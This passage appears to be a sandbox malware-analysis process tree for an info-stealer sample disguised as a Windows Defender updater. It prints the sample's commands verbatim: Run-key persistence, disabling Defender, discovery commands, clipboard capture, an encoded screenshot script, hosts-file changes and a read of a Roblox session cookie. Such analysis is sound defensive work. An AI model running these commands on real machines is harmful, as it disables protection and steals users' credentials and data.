      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,8835869785912385861,13823682111822396489,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2
      4⤵
      PID:5084
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,8835869785912385861,13823682111822396489,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4388
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,8835869785912385861,13823682111822396489,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2932 /prefetch:8
      4⤵
      PID:1516
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2164,8835869785912385861,13823682111822396489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:5020
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2164,8835869785912385861,13823682111822396489,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3640 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:2560
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2164,8835869785912385861,13823682111822396489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:1664
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2164,8835869785912385861,13823682111822396489,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4984 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3968
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\VBVEd6f.exe" & rd /s /q "C:\ProgramData\EBGIEGCFHCFH" & exit
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5396
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 10
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:2528
- C:\Users\Admin\AppData\Local\Temp\Files\maza-0.16.3-win64-setup-unsigned.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\maza-0.16.3-win64-setup-unsigned.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:3964
- C:\Users\Admin\AppData\Local\Temp\Files\Aquarius.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Aquarius.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:5712
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B503.tmp\B504.tmp\B505.bat C:\Users\Admin\AppData\Local\Temp\Files\Aquarius.exe"
    3⤵
    - Drops file in System32 directory
    PID:5896
  - - C:\Windows\system32\timeout.exe
      timeout 1
      4⤵
      Delays execution with timeout.exe
      PID:5912
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
      4⤵
      Adds Run key to start application
      PID:1948
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
      4⤵
      Adds Run key to start application
      PID:4052
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
      4⤵
      Adds Run key to start application
      PID:4616
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
      4⤵
      Adds Run key to start application
      PID:852
  - - C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
      "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
      4⤵
      Executes dropped EXE
      PID:3120
    - - C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5928
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'"
        6⤵
        
        PID:6032
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5464
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        6⤵
        
        PID:6044
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4316
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()""
        6⤵
        
        PID:4308
        
        C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()"
        7⤵
        
        PID:3704
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:892
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5456
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        6⤵
        
        PID:2600
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5480
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        6⤵
        
        PID:4720
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        7⤵
        
        PID:212
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
        6⤵
        
        PID:3324
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        7⤵
        
        PID:3364
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        6⤵
        
        PID:1260
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        7⤵
        Detects videocard installed
        
        PID:2656
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        6⤵
        
        PID:5888
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        7⤵
        Detects videocard installed
        
        PID:5836
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:3736
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        
        PID:1632
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:1504
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        
        PID:2028
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        6⤵
        
        PID:640
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        7⤵
        
        PID:3312
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        6⤵
        Clipboard Data
        
        PID:4036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        7⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:5456
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:1460
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        
        PID:4540
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:1280
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:5592
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        6⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4072
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        7⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5232
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        6⤵
        
        PID:2820
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        7⤵
        Gathers system information
        
        PID:2728
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
        6⤵
        
        PID:5988
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        7⤵
        
        PID:3368
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        6⤵
        
        PID:5960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1412
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0ol3wjt3\0ol3wjt3.cmdline"
        8⤵
        
        PID:2276
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF160.tmp" "c:\Users\Admin\AppData\Local\Temp\0ol3wjt3\CSCC2F453D15D246EA8B3956CC77E54A6.TMP"
        9⤵
        
        PID:4996
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:5896
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:5432
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
        6⤵
        
        PID:5488
        
        C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        7⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:484
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:3480
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:5416
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
        6⤵
        
        PID:5516
        
        C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        7⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:3460
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:6120
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:4840
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:3804
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        
        PID:576
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:6032
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:1772
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:5020
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:4664
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        6⤵
        
        PID:1772
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
